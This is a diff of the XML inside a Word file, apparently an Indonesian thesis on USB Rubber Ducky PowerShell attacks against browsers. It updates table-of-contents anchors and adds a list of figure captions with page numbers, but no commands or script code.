--- a/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
+++ b/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
@@ -7180,7 +7180,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087978" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194834" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7215,7 +7215,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087978 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194834 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7260,7 +7260,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087979" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194835" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7295,7 +7295,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087979 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194835 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7340,7 +7340,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087980" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194836" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7385,7 +7385,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087980 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194836 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7430,7 +7430,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087981" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194837" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7465,7 +7465,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087981 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194837 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7510,7 +7510,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087982" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194838" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7560,7 +7560,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087982 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194838 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7605,7 +7605,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087983" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194839" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7640,7 +7640,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087983 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194839 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7685,7 +7685,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087984" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194840" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7730,7 +7730,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087984 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194840 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7775,7 +7775,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087985" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194841" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7820,7 +7820,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087985 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194841 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7865,7 +7865,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087986" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194842" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7928,7 +7928,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087986 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194842 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -7973,7 +7973,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087987" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194843" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8018,7 +8018,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087987 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194843 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -8063,7 +8063,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087988" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194844" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8116,7 +8116,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087988 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194844 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -8161,7 +8161,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087989" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194845" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8214,7 +8214,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087989 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194845 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -8259,7 +8259,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087990" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194846" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8330,7 +8330,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087990 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194846 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -8375,7 +8375,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087991" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194847" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8410,7 +8410,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087991 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194847 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -8455,7 +8455,7 @@
           <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc43087992" w:history="1">
+      <w:hyperlink w:anchor="_Toc43194848" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8500,7 +8500,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc43087992 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194848 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -8521,6 +8521,1514 @@
             <w:webHidden/>
           </w:rPr>
           <w:t>36</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:right="44"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="es-ES"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="es-ES"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="es-ES"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> TOC \h \z \c "Gambar V-" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="es-ES"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194852" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Membuka CMD Sebagai Admin</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194852 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>37</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194853" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Masuk ke dalam CMD Sebagai Admin</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194853 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>38</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194854" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 3</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Perintah Membuat Folder</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>Baru</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194854 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>38</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194855" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 4</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Folder Baru Berhasil Dibuat</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194855 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>39</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194856" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 5</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">. Baris Perintah Membuat </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Script </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>b.ps1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194856 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>39</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194857" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 6</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">. </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Script </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>b.ps1 Berhasil Dibuat</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194857 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>40</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194858" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 7</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">.  Perintah Menjalankan </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>Script</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Dengan </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>Execution Policy</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194858 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>40</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194859" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 8</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">. Berhasil Mengunduh </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
